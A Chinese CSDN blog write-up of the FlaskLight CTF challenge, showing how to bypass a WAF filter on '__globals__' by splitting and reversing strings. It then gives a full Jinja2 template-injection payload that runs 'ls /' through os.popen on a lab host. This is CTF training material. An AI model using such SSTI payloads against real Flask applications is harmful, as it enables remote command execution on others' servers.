[CSCCTF 2019 Qual]FlaskLight

最新推荐文章于 2024-08-07 15:27:34 发布
最新推荐文章于 2024-08-07 15:27:34 发布
阅读量398 收藏 9
点赞数 9
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzqzzq11/article/details/134805966
版权 


 一打__globals__ 就出问题。因此判断防火墙有识别,识别了__globals__。

利用下面的方式绕过:

 ""["__cla""ss__"]
 "".__getattribute__("__cla""ss__")
 ""["__ssalc__"[::-1]]
 "".__getattribute__("__ssalc__"[::-1])

输入如下:

 http://8a3f25c5-af98-480c-95e1-93173b446604.node4.buuoj.cn:81/
 ?search={{[].__getattribute__("__ssalc__"[::-1]).__base__.__subclasses__()[59].__init__.__getattribute__("slabolg_cnuf"[::-1]).linecache.os.popen("ls /").read()}}

得到:

WHU_Joe.
关注
ssti练习之[CSCCTF 2019 Qual]FlaskLight 1
weixin_48335916的博客
01-05 579
[CSCCTF 2019 Qual]FlaskLight 1 查看网页源代码,发现里面的提示 尝试输入url http://e1f8bf68-fab7-482f-901b-12c336d1cdeb.node3.buuoj.cn/?search={{1*9}} 成功回显,说明存在ssti注入 使用{{’’.class.mro[2].subclasses()}},可以爆出object类中所有子类,找出subprocess.Popen,copy大佬额exp。 import requests import r
[CSCCTF 2019 Qual] FlaskLight
汗的博客
08-29 1602
信息收集 index大致就这样,没什么信息 F12看下,发现了线索:search参数 试下ssti 基本就是ssti了 漏洞利用 config 也是 Flask模版中的一个全局对象,它包含了所有应用程序的配置值。 {{ config.items() }} // 查看配置项目的信息 输入:http://xxxxx//?search={{%20config.items()%20}} 爆出一堆信息,这里获得第二个线索,flag在这个目录 You searched for: [('JSON_
[CSCCTF 2019 Qual]FlaskLight (jinja2模版注入)
最新发布
weixin_73399382的博客
08-07 548
这种有参数的我先直接丢fengjing扫了一下,结果还真搞出来,这工具还是挺牛的,就是没参数的时候搞不了。输入{{7*‘7’}},返回7777777表示是 Jinjia2 模块。进入web界面输入前三个参数,表单输入就是刚才的search参数。输入{{config}}查看配置发现提示flag就在当前目录下。分析完后右边会提示你输入可以输入命令自动生成payload。或者中间加个+号也可以['__glo'+'bals__']输入{{7*‘7’}},返回49表示是 Twig 模块。下面是判断模版注入的方法。
CSCCTF-2019-Qual-FlaskLight
Tajang的大千世界
02-09 356
CTF
checker-qual-3.5.0-API文档-中文版.zip
06-05
赠送jar包:checker-qual-3.5.0.jar; 赠送原API文档:checker-qual-3.5.0-javadoc.jar; 赠送源代码:checker-qual-3.5.0-sources.jar; 赠送Maven依赖信息文件:checker-qual-3.5.0.pom; 包含翻译后的API文档:...
checker-qual-3.5.0-API文档-中英对照版.zip
05-11
赠送jar包:checker-qual-3.5.0.jar; 赠送原API文档:checker-qual-3.5.0-javadoc.jar; 赠送源代码:checker-qual-3.5.0-sources.jar; 赠送Maven依赖信息文件:checker-qual-3.5.0.pom; 包含翻译后的API文档:...
checker-qual-2.11.1-API文档-中英对照版.zip
07-14
赠送jar包:checker-qual-2.11.1.jar; 赠送原API文档:checker-qual-2.11.1-javadoc.jar; 赠送源代码:checker-qual-2.11.1-sources.jar; 赠送Maven依赖信息文件:checker-qual-2.11.1.pom; 包含翻译后的API文档...
[CSCCTF 2019 Qual]FlaskLight ---不会编程的崽
不会编程的崽的博客
03-18 516
python jiaja2模板注入
Checker Compat Qual 2.0.0 中英对照版API文档
资源摘要信息:"checker-compat-qual-2.0.0-API文档-中英对照版.zip" 该资源为checker-compat-qual-2.0.0版本的API文档,支持中英文对照阅读。它主要针对使用Checker Framework的开发者,特别是需要兼容性质量检查的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值